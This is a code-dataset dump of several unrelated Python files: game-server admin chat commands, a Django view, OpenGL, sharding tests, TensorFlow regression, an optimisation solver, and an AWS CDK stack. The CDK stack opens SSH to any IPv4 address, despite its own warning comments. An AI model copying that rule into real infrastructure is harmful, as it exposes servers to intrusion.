i.sessionplayer.inputdevice._getAccountName(\n# False).encode('utf-8')\n#\n# if account_name == args[1]:\n# if not i.actor.node.hockey:\n# i.actor.node.hockey = True\n# else:\n# i.actor.node.hockey = False\n#\n# if not i.actor.node.invincible:\n# i.actor.node.invincible = True\n# else:\n# i.actor.node.invincible = False\n#\n# if i.actor._punchPowerScale == 1.2:\n# i.actor._punchPowerScale = 5\n# else:\n# i.actor._punchPowerScale = 1.2\n# else:\n# if not activity.players[\n# int(args[0])].actor.node.hockey:\n# activity.players[\n# int(args[0])].actor.node.hockey = True\n# else:\n# activity.players[\n# int(args[0])].actor.node.hockey = False\n#\n# if not activity.players[\n# int(args[0])].actor.node.invincible:\n# activity.players[\n# int(args[0])].actor.node.invincible = True\n# else:\n# activity.players[\n# int(args[0])].actor.node.invincible = False\n#\n# if not activity.players[\n# int(args[0])].actor._punchPowerScale == 1.2:\n# activity.players[\n# int(args[0])].actor._punchPowerScale = 5\n# else:\n# activity.players[\n# int(args[0])].actor._punchPowerScale = 1.2\n#\n#\n# @servercommand(commands=('/pause',),\n# statuses=(Status.ADMIN,))\n# def pause_callback(playerdata: PlayerData, args):\n# if not ba.getactivity().globalsnode.paused:\n# ba.getactivity().globalsnode.paused = True\n# else:\n# ba.getactivity().globalsnode.paused = False\n#\n#\n# @servercommand(commands=('/cameraMode', '/cam'),\n# statuses=(Status.ADMIN,))\n# def camera_mode_callback(playerdata: PlayerData, args):\n# if ba.getactivity().globalsnode.cameraMode == 'follow':\n# ba.getactivity().globalsnode.cameraMode = 'rotate'\n# else:\n# ba.getactivity().globalsnode.cameraMode = 'follow'\n#\n#\n# @servercommand(commands=('/icy',),\n# statuses=(Status.ADMIN,))\n# def icy_callback(playerdata: PlayerData, args):\n# if not args:\n# chatmessage(get_locale('chat_command_not_args_error')\n# elif len(args) >= 2:\n# activity.players[int(args[0])].actor.node = \\\n# activity.players[int(args[1])].actor.node\n#\n# activity.players[int(args[1])].actor.node = \\\n# activity.players[int(args[0])].actor.node\n#\n#\n# @servercommand(commands=('/maxPlayers', '/mp'),\n# statuses=(Status.ADMIN,))\n# def max_players_callback(playerdata: PlayerData, args):\n# if not args:\n# chatmessage(get_locale('chat_command_not_args_error')\n# else:\n# activity._maxPlayers = int(args[0])\n# _ba._setPublicPartyMaxSize(int(args[0]))\n#\n#\n# @servercommand(commands=('/rise',),\n# statuses=(Status.ADMIN,))\n# def rise_callback(playerdata: PlayerData, args):\n# if not args:\n# chatmessage(get_locale('chat_command_not_args_error')\n# elif args[0] == 'all':\n# for i in activity.players:\n# try:\n# activity.spawnPlayer(i)\n# except Exception:\n# pass\n# elif args[0] == 'device':\n# for i in activity.players:\n# account_name = i.sessionplayer.inputdevice._getAccountName(\n# False).encode('utf-8')\n#\n# if account_name == args[1]:\n# activity.spawnPlayer(i)\n# else:\n# activity.spawnPlayer(activity.players[int(args[0])])\n#\n#\n# @servercommand(commands=('/tnt',),\n# statuses=(Status.ADMIN,))\n# def tnt_callback(playerdata: PlayerData, args):\n# if not args:\n# chatmessage(get_locale('chat_command_not_args_error')\n# elif args[2] == 'myPos':\n# for i in activity.players:\n# if nick == i.get_name().encode('utf-8'):\n# pos = i.actor.node.position\n# ba.Bomb(bombType='tnt',\n# position=pos).autoRetain()\n# elif len(args) == 3:\n# ba.Bomb(bombType='tnt',\n# position=(float(args[0]),\n# float(args[1]),\n# float(args[2]))).autoRetain()\n#\n#\n# @servercommand(commands=('/bomb',),\n# statuses=(Status.ADMIN,))\n# def bomb_callback(playerdata: PlayerData, args):\n# if not args:\n# chatmessage(get_locale('chat_command_not_args_error')\n# elif args[0] == 'names':\n# chatmessage(get_locale('bomb_names_text')\n# send_chat_messages(get_locale('arg_bomb_options'))\n# chatmessage(get_locale('dividing_strip_text')\n# elif args[2] == 'myPos':\n# for i in activity.players:\n# if nick == i.get_name().encode('utf-8'):\n# pos = i.actor.node.position\n# ba.Bomb(bombType=str(args[0]),\n# blastRadius=float(args[1]),\n# position=pos).autoRetain()\n# elif len(args) == 5:\n# ba.Bomb(bombType=str(args[0]),\n# blastRadius=float(args[1]),\n# position=(float(args[2]),\n# float(args[3]),\n# float(args[4]))).autoRetain()\n#\n#\n# @servercommand(commands=('/blast',),\n# statuses=(Status.ADMIN,))\n# def blast_callback(playerdata: PlayerData, args):\n# if not args:\n# chatmessage(get_locale('chat_command_not_args_error')\n# elif args[1] == 'myPos':\n# for i in activity.players:\n# if nick == i.get_name().encode('utf-8'):\n# pos = i.actor.node.position\n# ba.Blast(blastRadius=float(args[0]),\n# position=pos).autoRetain()\n# elif len(args) == 4:\n# ba.Blast(blastRadius=float(args[0]),\n# position=(float(args[1]),\n# float(args[2]),\n# float(args[3]))).autoRetain()\n#\n#\n# @servercommand(commands=('/powerup', '/bonus'),\n# statuses=(Status.ADMIN,))\n# def powerup_callback(playerdata: PlayerData, args):\n# if not args:\n# chatmessage(get_locale('chat_command_not_args_error')\n# elif args[0] == 'names':\n# chatmessage(get_locale('powerup_names_text')\n# send_chat_messages(get_locale('arg_powerup_options'))\n# chatmessage(get_locale('dividing_strip_text')\n# elif args[1] == 'myPos':\n# for i in activity.players:\n# if nick == i.get_name().encode('utf-8'):\n# pos = i.actor.node.position\n# ba.Powerup(powerupType=str(args[0]),\n# position=pos).autoRetain()\n# elif len(args) == 4:\n# ba.Powerup(powerupType=str(args[0]),\n# position=(float(args[1]),\n# float(args[2]),\n# float(args[3]))).autoRetain()\n#\n#\n# @servercommand(commands=('/inv',),\n# statuses=(Status.ADMIN,))\n# def inv_callback(playerdata: PlayerData, args):\n# if not args:\n# chatmessage(get_locale('chat_command_not_args_error')\n# elif args[0] == 'all':\n# for i in activity.players:\n# try:\n# i.actor.node.name = ''\n# i.actor.node.colorTexture = None\n# i.actor.node.colorMaskTexture = None\n# i.actor.node.headModel = None\n# i.actor.node.torsoModel = None\n# i.actor.node.pelvisModel = None\n# i.actor.node.upperArmModel = None\n# i.actor.node.foreArmModel = None\n# i.actor.node.handModel = None\n# i.actor.node.upperLegModel = None\n# i.actor.node.lowerLegModel = None\n# i.actor.node.toesModel = None\n# i.actor.node.style = 'cyborg'\n# except Exception:\n# pass\n# elif args[0] == 'device':\n# for i in activity.players:\n# account_name = i.sessionplayer.inputdevice._getAccountName(\n# False).encode('utf-8')\n#\n# if account_name == args[1]:\n# i.actor.node.name = ''\n# i.actor.node.colorTexture = None\n# i.actor.node.colorMaskTexture = None\n# i.actor.node.headModel = None\n# i.actor.node.torsoModel = None\n# i.actor.node.pelvisModel = None\n# i.actor.node.upperArmModel = None\n# i.actor.node.foreArmModel = None\n# i.actor.node.handModel = None\n# i.actor.node.upperLegModel = None\n# i.actor.node.lowerLegModel = None\n# i.actor.node.toesModel = None\n# i.actor.node.style = 'cyborg'\n# else:\n# t = activity.players[int(args[0])].actor.node\n# t.name = ''\n# t.colorTexture = None\n# t.colorMaskTexture = None\n# t.headModel = None\n# t.torsoModel = None\n# t.pelvisModel = None\n# t.upperArmModel = None\n# t.foreArmModel = None\n# t.handModel = None\n# t.upperLegModel = None\n# t.lowerLegModel = None\n# t.toesModel = None\n# t.style = 'cyborg'\n#\n#\n# @servercommand(commands=('/ban',),\n# statuses=(Status.ADMIN,))\n# def ban_callback(playerdata: PlayerData, args):\n# if len(args) < 2 or (args[0] == 'device' and len(args) < 3):\n# chatmessage(get_locale('chat_command_not_args_error')\n# elif args[0] == 'device':\n# for p in activity.players:\n# operator = None\n# account_id = None\n#\n# bd_server_player = bd.server.get_player('client_id',\n# client_id)\n# if 'id' in bd_server_player:\n# operator = bd_server_player['id']\n#\n# account_name = p.sessionplayer.inputdevice._getAccountName(\n# False).encode('utf-8')\n#\n# if account_name == args[1]:\n# account_id = p.get_account_id()\n#\n# try:\n# end = args[3]\n# except IndexError:\n# end = None\n#\n# _ba._disconnectClient(p.sessionplayer.inputdevice.client_id())\n# if account_id is not None:\n# api.player.ban.add(\n# in_thread=True,\n# id=account_id,\n# reason=args[2],\n# operator=operator,\n# end=end)\n# else:\n# operator = \"CONSOLE\"\n# account_id = None\n#\n# bd_server_player = bd.server.get_player('client_id',\n# client_id)\n# if 'id' in bd_server_player:\n# operator = bd_server_player['id']\n#\n# account_id = activity.players[int(args[0])].get_account_id()\n#\n# try:\n# end = args[2]\n# except IndexError:\n# end = None\n#\n# _ba._disconnectClient(activity.players[int(args[0])].sessionplayer.inputdevice.client_id())\n# if account_id is not None:\n# api.player.ban.add(\n# in_thread=True,\n# id=account_id,\n# reason=args[1],\n# operator=operator,\n# end=end)\n#\n#\n# @servercommand(commands=['/fakekickvote', '/fkv'],\n# statuses=[Status.ADMIN])\n# def fakekickvote_callback(playerdata: PlayerData, args):\n# if not args:\n# chatmessage(get_locale('chat_command_not_args_error')\n# else:\n# activity = _ba._getForegroundHostActivity()\n#\n# p = activity.players[int(args[0])]\n# device = p.sessionplayer.inputdevice\n# ba.screenMessage(get_format_locale('kickvote_start', name=p.get_name()), color=(1, 1, 0))\n# ba.screenMessage(get_format_locale('kickvote_type'), color=(1, 1, 0))\n# ba.screenMessage(get_format_locale('kickvote_needed_num', n='4'), color=(1, 1, 0))\n#\n# @servercommand(func=lambda m: check_message_for_team(m),\n# statuses=['anyone'])\n# def team_detect_callback(playerdata: PlayerData, args):\n# activity = _ba._getForegroundHostActivity()\n#\n# device = None\n# player = None\n# for p in activity.players:\n# if client_id == p.sessionplayer.inputdevice.client_id():\n# device = p.sessionplayer.inputdevice\n# player = p\n# break\n#\n# chatmessage(get_locale('team_warn', name=device.player.sessionplayer.get_name(),\n# account_id=player.get_account_id())\n","repo_name":"BombDash/BombDash-server","sub_path":"src/python/bd/chat/commands.py","file_name":"commands.py","file_ext":"py","file_size_in_byte":36078,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"5"} +{"seq_id":"26016107463","text":"# encoding: utf-8\n# from django.contrib.auth.decorators import login_required\nfrom datetime import datetime, timedelta\nfrom django.core.context_processors import csrf\nfrom django.http import Http404\nfrom django.shortcuts import render_to_response\nimport itertools\nfrom calendario.forms import SetupForm\n\n\n# @login_required\n# def setup(request):\n# form = SetupForm(initial={'semanas': 16, 'fecha_de_inicio': datetime.today()})\n# c = {'form': form}\n# c.update(csrf(request))\n# return render_to_response('setup.html', c)\n\n\ndef agrupar_clases_por_semana(clases, cantidad):\n clases_de_la_semana = tuple(itertools.islice(clases, cantidad))\n while clases_de_la_semana:\n yield clases_de_la_semana\n clases_de_la_semana = tuple(itertools.islice(clases, cantidad))\n\n\n# @login_required\ndef create(request):\n if request.method == \"POST\":\n form = SetupForm(request.POST)\n if form.is_valid():\n semanas = form.cleaned_data['semanas']\n fecha_de_inicio = form.cleaned_data['fecha_de_inicio']\n lunes_de_esa_semana = fecha_de_inicio + timedelta(days=-fecha_de_inicio.weekday())\n\n dias_de_clase = []\n # agrego los días de clase si los tildaron en el form.\n form.cleaned_data['lunes'] and dias_de_clase.append(0)\n form.cleaned_data['martes'] and dias_de_clase.append(1)\n form.cleaned_data['miercoles'] and dias_de_clase.append(2)\n form.cleaned_data['jueves'] and dias_de_clase.append(3)\n form.cleaned_data['viernes'] and dias_de_clase.append(4)\n form.cleaned_data['sabado'] and dias_de_clase.append(5)\n\n clases = (lunes_de_esa_semana + timedelta(s*7+d) for s in xrange(semanas) for d in dias_de_clase)\n clases_por_semana = len(dias_de_clase)\n clases = agrupar_clases_por_semana(clases, clases_por_semana)\n\n return render_to_response('create.html', {'clases': clases, 'clases_por_semana': clases_por_semana})\n else:\n c = {'form': form}\n c.update(csrf(request))\n return render_to_response('setup.html', c)\n else:\n raise Http404\n","repo_name":"gsorianob/materias","sub_path":"calendario/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2173,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"71095273432","text":"import math\nfrom OpenGL.GL import *\n\nRESOLUTION = 15\n\nclass Shader:\n def __init__(self, radius, background_color):\n self._radius = radius\n self._background_color = background_color\n self._display_list_id = None\n\n def render(self, x, y, z):\n if self._display_list_id is None:\n self._display_list_id = self._create_display_list()\n glPushMatrix()\n glTranslatef(x, y, z)\n glCallList(self._display_list_id)\n glPopMatrix()\n \n def _create_display_list(self):\n bg_r, bg_g, bg_b, bg_a = self._background_color\n angle_increment = 2 * math.pi / RESOLUTION\n display_list_id = glGenLists(1)\n glNewList(display_list_id, GL_COMPILE)\n glBegin(GL_TRIANGLE_FAN)\n glColor4f(bg_r, bg_g, bg_b, 0)\n glVertex3f(0, 0, 0)\n glColor4f(bg_r, bg_g, bg_b, 1)\n for i in range(RESOLUTION):\n angle1 = angle_increment * i\n angle2 = angle_increment * (i+1)\n glVertex3f(math.cos(angle1) * self._radius, 0, math.sin(angle1) * self._radius)\n glVertex3f(math.cos(angle2) * self._radius, 0, math.sin(angle2) * self._radius)\n glEnd()\n glEndList()\n return display_list_id\n","repo_name":"gaborpapp/AIam","sub_path":"movement_ai/ui/shader.py","file_name":"shader.py","file_ext":"py","file_size_in_byte":1237,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"19156373434","text":"class BankAccount:\n def acc(self,name,acc,savings):\n self.name=name\n self.acc=acc\n self.savings=savings\n def deposit(self,d):\n self.savings=self.savings+d\n def withdraw(self,w):\n self.savings=self.savings-w\n def display(self):\n print(\"NAME:\",self.name)\n print(\"Account No.:\",self.acc)\n print(\"Account Balance:\",self.savings)\nb1= BankAccount()\nb1.acc(\"Divyam\",199930062000,98000)\nch=''\nwhile(ch!=5):\n print(\"MAIN MENU\")\n print(\"1.DEPOSIT\")\n print(\"2.WITHDRAW\")\n print(\"3.BALANCE EQUERY\")\n print(\"4.EXIT\")\n ch=int(input())\n if ch==1:\n d=int(input())\n b1.deposit(d)\n if ch==2:\n w=int(input())\n b1.withdraw(w)\n if ch==3:\n b1.display()\n if ch==4:\n break\n ","repo_name":"NehaMuskan/5th_Semester_Python","sub_path":"Assignment-10/Q4.py","file_name":"Q4.py","file_ext":"py","file_size_in_byte":796,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"29825373431","text":"\"\"\"Test auto sharding with convolution nets.\"\"\"\n\nimport unittest\nfrom typing import Any\n\nfrom flax import linen as nn\nfrom flax.training import train_state, dynamic_scale as dynamic_scale_lib\nimport jax\nimport jax.numpy as jnp\nimport numpy as np\nimport optax\n\nfrom alpa import parallelize, ShardParallel, LocalPhysicalDeviceMesh, AutoShardingOption\nfrom alpa.util import map_to_shape, count_communication_primitives\n\nfrom tests.shard_parallel.test_mlp import assert_close, assert_all_replicated, is_sharded\n\n\nclass TrainState(train_state.TrainState):\n batch_stats: Any\n dynamic_scale: dynamic_scale_lib.DynamicScale\n\n\ndef assert_data_parallel_cost(state,\n hlo_ir,\n objective,\n device_mesh,\n as_option,\n mesh_dim,\n allow_not_sharded_params=0):\n params = jax.tree_util.tree_leaves(state.params)\n opt_state = jax.tree_util.tree_leaves(state.opt_state)\n batch_stats = jax.tree_util.tree_leaves(state.batch_stats)\n\n # Check communication cost\n replicated_penalty = int(\n device_mesh.all_reduce_cost(1, 0) + device_mesh.all_reduce_cost(1, 1))\n weight_sync = sum(\n device_mesh.all_reduce_cost(np.prod(x.shape) * 4, mesh_dim) +\n replicated_penalty for x in params)\n num_batch_norm = len(batch_stats) // 2\n batch_norm_sync = 2 * sum(\n device_mesh.all_reduce_cost(np.prod(x.shape) * 4, mesh_dim) +\n replicated_penalty for x in batch_stats)\n expected = weight_sync + batch_norm_sync\n\n assert_close(objective, expected, atol=0.05)\n\n # Check numbers of communication primitives\n n_total, n_all_reduce, n_all_gather, n_reduce_scatter, _ = (\n count_communication_primitives(hlo_ir, ignore_scalar_all_reduce=True))\n\n if as_option.prefer_reduce_scatter:\n assert n_all_reduce == num_batch_norm * 2\n assert n_reduce_scatter > 0\n assert n_all_gather <= 2\n assert n_total == n_all_reduce + n_reduce_scatter + n_all_gather\n else:\n assert n_all_reduce == 1 + num_batch_norm * 2\n assert n_total == n_all_reduce\n\n if as_option.prefer_reduce_scatter:\n num_not_sharded = 0\n for weight in opt_state:\n if not is_sharded(weight) and len(weight.shape) > 1:\n num_not_sharded += 1\n assert num_not_sharded == 0\n else:\n for weight in params:\n assert_all_replicated(weight, np.prod(device_mesh.shape))\n\n\nclass AutoShardingConvTest(unittest.TestCase):\n\n def setUp(self):\n assert len(jax.local_devices()) >= 4\n self.physical_mesh = LocalPhysicalDeviceMesh(jax.local_devices()[:4])\n self.as_option = AutoShardingOption()\n\n def get_device_mesh(self, shape, mesh_alpha, mesh_beta):\n return self.physical_mesh.get_logical_mesh(shape, mesh_alpha, mesh_beta)\n\n def run_n_layer_conv(self,\n num_layers,\n batch_size,\n image_size,\n channel,\n device_mesh,\n use_bias=False,\n is_depthwise=False):\n if not is_depthwise:\n\n class Model(nn.Module):\n\n @nn.compact\n def __call__(self, x, train=True):\n for i in range(num_layers):\n x = nn.Conv(features=channel,\n kernel_size=(3, 3),\n strides=(2, 2),\n use_bias=use_bias)(x)\n x = nn.BatchNorm(use_running_average=not train)(x)\n x = nn.relu(x)\n x = nn.max_pool(x,\n window_shape=(2, 2),\n strides=(1, 1),\n padding=\"SAME\")\n return x\n\n x = jnp.ones((batch_size, image_size, image_size, channel))\n out_image_size = image_size // (2**num_layers)\n y = jnp.ones((batch_size, out_image_size, out_image_size, channel))\n else:\n\n class Model(nn.Module):\n\n @nn.compact\n def __call__(self, x, train=True):\n x = nn.Conv(features=8 * channel,\n kernel_size=(3, 3),\n strides=(1, 1),\n use_bias=use_bias)(x)\n x = nn.Conv(features=8 * channel,\n kernel_size=(3, 3),\n strides=(1, 1),\n feature_group_count=8 * channel,\n use_bias=use_bias)(x)\n x = nn.Conv(features=channel,\n kernel_size=(3, 3),\n strides=(1, 1),\n use_bias=use_bias)(x)\n x = nn.relu(x)\n x = nn.BatchNorm(use_running_average=not train)(x)\n return x\n\n x = jnp.ones((batch_size, image_size, image_size, channel))\n y = jnp.ones((batch_size, image_size, image_size, channel))\n\n @parallelize(method=ShardParallel(devices=device_mesh,\n auto_sharding_option=self.as_option))\n def train_step(state, batch):\n\n def loss_func(params):\n out, new_model_state = state.apply_fn(\n {\n \"params\": params,\n \"batch_stats\": state.batch_stats\n },\n batch[\"x\"],\n mutable=['batch_stats'])\n loss = jnp.mean((out - batch[\"y\"])**2)\n return loss, new_model_state\n\n grads, new_model_state = jax.grad(loss_func,\n has_aux=True)(state.params)\n new_state = state.apply_gradients(\n grads=grads, batch_stats=new_model_state['batch_stats'])\n return new_state\n\n # Init train state\n model = Model()\n rngkey = jax.random.PRNGKey(0)\n params = model.init(rngkey, x)\n tx = optax.sgd(0.1, momentum=0.9)\n state = TrainState.create(apply_fn=model.apply,\n params=params[\"params\"],\n tx=tx,\n batch_stats=params[\"batch_stats\"],\n dynamic_scale=None)\n\n # JIT compile\n state = train_step(state, {\"x\": x, \"y\": y})\n\n # Get optimized HLO IR\n executable = train_step.get_last_executable()\n return (state, executable.get_hlo_text(),\n executable.auto_sharding_objective)\n\n def test_n_layer_conv_data_parallel(self):\n batch_size = 16\n image_size = 16\n num_layers = 3\n channel = 4\n\n # Test on different device meshes\n for i, mesh_shape in enumerate([(4, 1), (1, 4)]):\n device_mesh = self.get_device_mesh(mesh_shape, [1, 1], [1, 1])\n state, hlo_ir, objective = self.run_n_layer_conv(\n num_layers, batch_size, image_size, channel, device_mesh)\n\n assert_data_parallel_cost(state, hlo_ir, objective, device_mesh,\n self.as_option, i)\n\n def test_n_layer_conv_model_parallel(self):\n batch_size = 8\n image_size = 16\n num_layers = 4\n channel = 256\n\n # Test on different device meshes\n for i, mesh_shape in enumerate([(4, 1), (1, 4)]):\n device_mesh = self.get_device_mesh(mesh_shape, [1, 1], [1, 1])\n state, hlo_ir, objective = self.run_n_layer_conv(\n num_layers, batch_size, image_size, channel, device_mesh)\n\n n_total, n_all_reduce, n_all_gather, n_reduce_scatter, _ = (\n count_communication_primitives(hlo_ir,\n ignore_scalar_all_reduce=True))\n\n assert n_all_reduce == num_layers - 1\n assert n_total == n_all_reduce\n\n def test_n_layer_conv_2d_mesh(self):\n batch_size = 8\n image_size = 32\n num_layers = 4\n channel = 8\n self.as_option.allow_mixed_mesh_shape = False\n\n device_mesh = self.get_device_mesh([2, 2], [1, 1], [1, 0.1])\n state, hlo_ir, objective = self.run_n_layer_conv(\n num_layers, batch_size, image_size, channel, device_mesh)\n\n # Check numbers of communication primitives\n n_total, n_all_reduce, n_all_gather, n_reduce_scatter, n_all_to_all = (\n count_communication_primitives(hlo_ir,\n ignore_scalar_all_reduce=True))\n if self.as_option.prefer_reduce_scatter:\n assert n_reduce_scatter > 0\n if self.as_option.allow_mixed_mesh_shape:\n assert n_all_to_all > 0\n\n def test_n_layer_conv_2d_mesh_mixed_shape(self):\n self.as_option.allow_mixed_mesh_shape = True\n self.test_n_layer_conv_2d_mesh()\n\n def test_n_layer_conv_data_parallel_reduce_scatter(self):\n self.as_option.prefer_reduce_scatter = True\n self.test_n_layer_conv_data_parallel()\n\n def test_n_layer_conv_2d_mesh_mixed_shape_reduce_scatter(self):\n self.as_option.allow_mixed_mesh_shape = True\n self.as_option.prefer_reduce_scatter = True\n self.test_n_layer_conv_2d_mesh()\n\n def test_n_layer_depthwise_conv_model_parallel(self):\n batch_size = 4\n image_size = 8\n num_layers = 2\n channel = 256\n\n # Test on different device meshes\n for i, mesh_shape in enumerate([(4, 1), (1, 4)]):\n device_mesh = self.get_device_mesh(mesh_shape, [1, 1], [1, 1])\n state, hlo_ir, objective = self.run_n_layer_conv(num_layers,\n batch_size,\n image_size,\n channel,\n device_mesh,\n is_depthwise=True)\n\n n_total, n_all_reduce, n_all_gather, n_reduce_scatter, _ = (\n count_communication_primitives(hlo_ir,\n ignore_scalar_all_reduce=True))\n assert n_all_reduce == 1\n assert n_total == n_all_reduce\n\n\ndef suite():\n suite = unittest.TestSuite()\n\n def add(name):\n suite.addTest(AutoShardingConvTest(name))\n\n add(\"test_n_layer_conv_data_parallel\")\n add(\"test_n_layer_conv_model_parallel\")\n add(\"test_n_layer_conv_2d_mesh\")\n add(\"test_n_layer_conv_2d_mesh_mixed_shape\")\n\n add(\"test_n_layer_conv_data_parallel_reduce_scatter\")\n add(\"test_n_layer_conv_2d_mesh_mixed_shape_reduce_scatter\")\n\n add(\"test_n_layer_depthwise_conv_model_parallel\")\n\n return suite\n\n\nif __name__ == \"__main__\":\n runner = unittest.TextTestRunner()\n runner.run(suite())\n","repo_name":"alpa-projects/alpa","sub_path":"tests/shard_parallel/test_conv.py","file_name":"test_conv.py","file_ext":"py","file_size_in_byte":11219,"program_lang":"python","lang":"en","doc_type":"code","stars":2855,"dataset":"github-code","pt":"5"} +{"seq_id":"36808113180","text":"import os.path\nfrom aws_cdk.aws_s3_assets import Asset\nfrom aws_cdk import (\n aws_ec2 as ec2,\n aws_iam as iam,\n core\n)\n\ndirname = os.path.dirname(__file__)\n\nclass PhpMysqlBenchStack(core.Stack):\n\n def __init__(self, scope: core.Construct, id: str, vpc, **kwargs) -> None:\n super().__init__(scope, id, **kwargs)\n \n amzn_linux = ec2.MachineImage.latest_amazon_linux(\n generation=ec2.AmazonLinuxGeneration.AMAZON_LINUX_2,\n edition=ec2.AmazonLinuxEdition.STANDARD,\n virtualization=ec2.AmazonLinuxVirt.HVM,\n storage=ec2.AmazonLinuxStorage.GENERAL_PURPOSE\n )\n \n # Allow to be managed via SSM\n \n role = iam.Role(self, \"InstanceSSM\", assumed_by=iam.ServicePrincipal(\"ec2.amazonaws.com\"))\n role.add_managed_policy(iam.ManagedPolicy.from_aws_managed_policy_name(\"service-role/AmazonEC2RoleforSSM\"))\n \n ## Setup key_name for EC2 instance login if you don't use Session Manager\n ## Create keypair in AWS console\n ## Change .any_ipv4 to a specific IP address/range to reduce attack surface\n\n #key_name = \"{keypair}\"\n #apachephp.allow_ssh_access_from(ec2.Peer.any_ipv4())\n #apachephp.allow_ssh_access_from(ec2.Peer.ipv4('10.44.0.0/24'))\n #apachephp.instance.instance.add_property_override(\"KeyName\", key_name)\n \n mySecurityGroup = ec2.SecurityGroup(\n self,\n 'ApachePHP SecurityGroup',\n vpc=vpc,\n security_group_name=\"apachephp-ssh-access-sg\",\n description= 'Allow ssh and http/https access to ec2 instances from anywhere',\n allow_all_outbound=True\n )\n \n apachephp = ec2.Instance(\n self,\n id=\"LoadGen\",\n vpc=vpc,\n vpc_subnets={\"subnet_type\": ec2.SubnetType.PUBLIC},\n instance_name=\"ApachePHP\",\n instance_type=ec2.InstanceType(\"m5.xlarge\"),\n machine_image=amzn_linux,\n role = role,\n security_group = mySecurityGroup\n )\n \n # lock down and change from any_ipv() to ipv4('CIDR') based on your network\n # do not leave this wide open as below.\n \n mySecurityGroup.add_ingress_rule(ec2.Peer.any_ipv4(), ec2.Port.tcp(22), 'allow public ssh access')\n mySecurityGroup.add_ingress_rule(ec2.Peer.any_ipv4(), ec2.Port.tcp(80), 'allow public http access')\n mySecurityGroup.add_ingress_rule(ec2.Peer.any_ipv4(), ec2.Port.tcp(443), 'allow public https access')\n \n asset = Asset(self, \"Asset\", path=os.path.join(dirname, \"assets/http_deploy.sh\"))\n local_path = apachephp.user_data.add_s3_download_command(\n bucket=asset.bucket,\n bucket_key=asset.s3_object_key\n )\n \n apachephp.user_data.add_execute_file_command(file_path=local_path)\n asset.grant_read(apachephp.role)\n\n \n\n\n ec2.CfnEIP(self, id=\"ApachePHPHostEIP\", domain=\"vpc\", instance_id=apachephp.instance_id)\n \n core.CfnOutput(\n self,\n id=\"ApachePHPPrivateIP\",\n value=apachephp.instance_private_ip,\n description=\"APACHE PHP Private IP\",\n export_name=f\"{self.region}:{self.account}:{self.stack_name}:apachephp-private-ip\"\n )\n\n core.CfnOutput(\n self,\n id=\"ApachePHPPublicIP\",\n value=apachephp.instance_public_ip,\n description=\"APACHEPHP Public IP\",\n export_name=f\"{self.region}:{self.account}:{self.stack_name}:apachephp-public-ip\"\n )\n \n","repo_name":"094459/devday-graviton","sub_path":"benchmark/php-mysql/php_mysql_bench/php_mysql_bench_stack.py","file_name":"php_mysql_bench_stack.py","file_ext":"py","file_size_in_byte":3632,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"9507082696","text":"import sys\nimport numpy as np \nimport tensorflow as tf \nx=list(sys.argv[3].split(\",\"))\ny=list(sys.argv[2].split(\",\"))\ndaysleft=int(sys.argv[1])\nfor i in range(len(x)):\n x[i]=float(x[i])\n y[i]=float(y[i])\n\npre=np.arange(1,daysleft+1)\n#print(\"x=\",x,\" y=\",y)\nn = len(x)\nX = tf.placeholder(\"float\") \nY = tf.placeholder(\"float\") \nW = tf.Variable(np.random.randn(), name = \"W\") \nb = tf.Variable(np.random.randn(), name = \"b\") \nlearning_rate = 0.01\ntraining_epochs = 1000\ny_pred = tf.add(tf.multiply(X, W), b) \n\ncost = tf.reduce_sum(tf.pow(y_pred-Y, 2)) / (2 * n) \n\n# Gradient Descent Optimizer \noptimizer = tf.train.GradientDescentOptimizer(learning_rate).minimize(cost) \n\ninit = tf.global_variables_initializer() \n\nwith tf.Session() as sess: \n \n\tsess.run(init) \n \n\tfor epoch in range(training_epochs): \n \n\t\tfor (_x, _y) in zip(x, y): \n\t\t\tsess.run(optimizer, feed_dict = {X : _x, Y : _y}) \n\t\tif (epoch + 1) % 50 == 0: \n\t\t\tc = sess.run(cost, feed_dict = {X : x, Y : y}) \n\t\t\t# print(\"Epoch\", (epoch + 1), \": cost =\", c, \"W =\", sess.run(W), \"b =\", sess.run(b)) \n\t\n\ttraining_cost = sess.run(cost, feed_dict ={X: x, Y: y}) \n\tweight = sess.run(W) \n\tbias = sess.run(b)\npredictions=[]\nfor j in range(daysleft):\n predictions.append(weight * pre[j] + bias)\n\nprint(predictions)\nsys.stdout.flush()\n\n\n","repo_name":"Tarun-Narain/Electricity-Management-System","sub_path":"AWS EC2 (AMI) With GPU (Tensorflow)/tfmodel.py","file_name":"tfmodel.py","file_ext":"py","file_size_in_byte":1290,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"5"} +{"seq_id":"40674046584","text":"import time\n\nimport numpy as np\nfrom cvxopt import matrix, solvers\nfrom scipy.optimize import linprog\n\n\n# warnings.filterwarnings('ignore', '.*Ill-conditioned*')\n\n\ndef linprog_solver_row(value_matrix, precision=4):\n value_matrix = np.nan_to_num(np.round(value_matrix, precision))\n m, n = value_matrix.shape\n\n # solve col\n # objectif vector c is 0*x1+0*x2+...+0*xn+v\n C = []\n for i in range(n):\n C.append(0)\n C.append(-1)\n A = []\n for i_col in range(n):\n col = value_matrix[:, i_col]\n constraint_row = []\n for item in col:\n constraint_row.append(-item)\n constraint_row.append(1)\n A.append(constraint_row)\n B = []\n for i in range(m):\n B.append(0)\n\n A_eq = []\n A_eq_row = []\n for i in range(n):\n A_eq_row.append(1)\n A_eq_row.append(0)\n A_eq.append(A_eq_row)\n B_eq = [1]\n\n bounds = []\n for i in range(n):\n bounds.append((0, 1))\n bounds.append((None, None))\n\n options = {'cholesky': False,\n 'sym_pos': False,\n 'lstsq': True,\n 'presolve': True},\n\n res = linprog(C, A_ub=A, b_ub=B, A_eq=A_eq, b_eq=B_eq, bounds=bounds,\n options={'cholesky': False,\n 'sym_pos': False,\n 'lstsq': True,\n 'presolve': True})\n policy = res['x'][:-1]\n for i, p in enumerate(policy):\n if p < 10e-8:\n policy[i] = 0\n return policy, -res['fun']\n\n\ndef linprog_solver_col(value_matrix, precision=4):\n policy, value = 